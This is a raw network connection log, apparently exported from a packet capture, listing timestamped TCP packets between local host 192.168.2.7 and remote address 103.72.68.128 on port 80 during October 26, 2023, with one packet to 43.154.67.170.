                                                                              Oct 26, 2023 09:47:56.917982101 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:56.918037891 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.250570059 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.250596046 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.250608921 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.250622988 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.250660896 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.250678062 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.250721931 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.250796080 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.250833035 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.250888109 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.250941992 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.250973940 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.583308935 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.583333015 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.583347082 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.583362103 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.583441973 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.583450079 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.583475113 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.583533049 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.583575010 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.583724976 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.583817005 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.583853960 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.583883047 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.583972931 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.584011078 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.584028006 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.584094048 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.584127903 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.584253073 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.584266901 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.584315062 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.584340096 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.584389925 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.584429979 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.916054010 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916120052 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916158915 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916188002 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.916201115 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916239977 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916250944 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.916280031 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916317940 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916326046 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.916361094 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916399002 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916408062 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.916436911 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916474104 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916485071 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.916512966 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916551113 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916563988 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.916587114 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916625023 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916626930 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.916663885 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916702986 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916708946 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.916738987 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916776896 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.916778088 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916817904 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916857958 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916858912 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.916894913 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916932106 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.916933060 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.916970015 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.917006969 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.917124033 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.917164087 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.917202950 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.917202950 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.917239904 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.917282104 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.917335033 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.917373896 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.917412996 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.917414904 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:57.917495012 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:57.917536020 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.249416113 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.249438047 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.249450922 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.249464989 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.249478102 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.249495983 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.249535084 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.249548912 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.249588966 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.249627113 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.249643087 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.249684095 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.249707937 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.249747038 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.249814034 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.249820948 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.249856949 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.249891996 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.249901056 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.249943018 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.249985933 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.249998093 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.250032902 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.250082970 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.250134945 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.250200033 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.250235081 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.250302076 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.250364065 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.250396013 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.250483036 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.250550032 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.250585079 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.250633001 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.250700951 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.250731945 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.250745058 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.250869989 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.250931978 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.250961065 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251027107 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251090050 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.251113892 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251144886 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251219988 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251233101 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.251260996 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251307011 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251316071 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.251336098 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251377106 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.251396894 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251452923 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251497984 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.251512051 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251557112 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251593113 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.251622915 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251662016 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251674891 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251718044 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.251739979 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251800060 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.251812935 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251844883 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251878977 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.251900911 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251960993 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251976967 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.251996040 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.252037048 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.252079964 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.252088070 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.252131939 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.252170086 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.252180099 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.252242088 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.252284050 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.258574963 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.258596897 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.258610010 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.258645058 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.258682966 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.258717060 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.258734941 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.258779049 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.258815050 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.258865118 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.258908033 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.258960009 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.258984089 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.259004116 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.259037018 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.259051085 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.259099007 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.259134054 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.362205982 CEST4976180192.168.2.743.154.67.170
                                                                              Oct 26, 2023 09:47:58.581940889 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.581964016 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.582022905 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.582110882 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.582189083 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.582189083 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.582201004 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.582295895 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.582338095 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.582384109 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.582447052 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.582484007 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.582660913 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.582761049 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.582793951 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.582873106 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.582905054 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.582942009 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.582963943 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.583029032 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.583074093 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.583086014 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.583152056 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.583184958 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.583235025 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.583317041 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.583357096 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.583395958 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.583460093 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.583499908 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.583553076 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.583630085 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.583663940 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.583710909 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.583739042 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.583775997 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.583830118 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.583911896 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.583946943 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.584003925 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.584076881 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.584115028 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.584180117 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.584234953 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.584273100 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.584307909 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.584373951 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.584410906 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.584422112 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.584491968 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.584530115 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.584557056 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.584616899 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.584654093 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.584734917 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.584805965 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.584846020 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.584867001 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.585172892 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.585211039 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.585247040 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.585494995 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.585536957 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.585566044 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.585599899 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.585630894 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.585652113 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.585715055 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.585752010 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.585861921 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.585933924 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.585969925 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.586010933 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586052895 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586086988 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.586118937 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586180925 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586219072 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.586247921 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586318970 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586350918 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.586363077 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586410046 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586446047 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.586484909 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586529016 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586561918 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.586617947 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586663008 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586702108 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.586741924 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586796999 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586837053 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.586858988 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586908102 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.586944103 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.586980104 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.587023020 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.587059975 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.587100983 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.587141991 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.587179899 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.587209940 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.587279081 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.587316990 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.587343931 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.587433100 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.587469101 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.587496996 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.587553024 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.587590933 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.587622881 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.587680101 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.587718010 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.591100931 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.591214895 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.591273069 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.591289043 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.591368914 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.591407061 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.591453075 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.591542006 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.591573000 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.591622114 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.591696024 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.591737032 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.591757059 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.591815948 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.591851950 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.591897011 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.591998100 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.592060089 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.592068911 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.592130899 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.592171907 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.592209101 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.592247009 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.592283010 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.592333078 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.592375994 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.592412949 CEST4976280192.168.2.7103.72.68.128
                                                                              Oct 26, 2023 09:47:58.592449903 CEST8049762103.72.68.128192.168.2.7
                                                                              Oct 26, 2023 09:47:58.592526913 CEST8049762103.72.68.128192.168.2.7
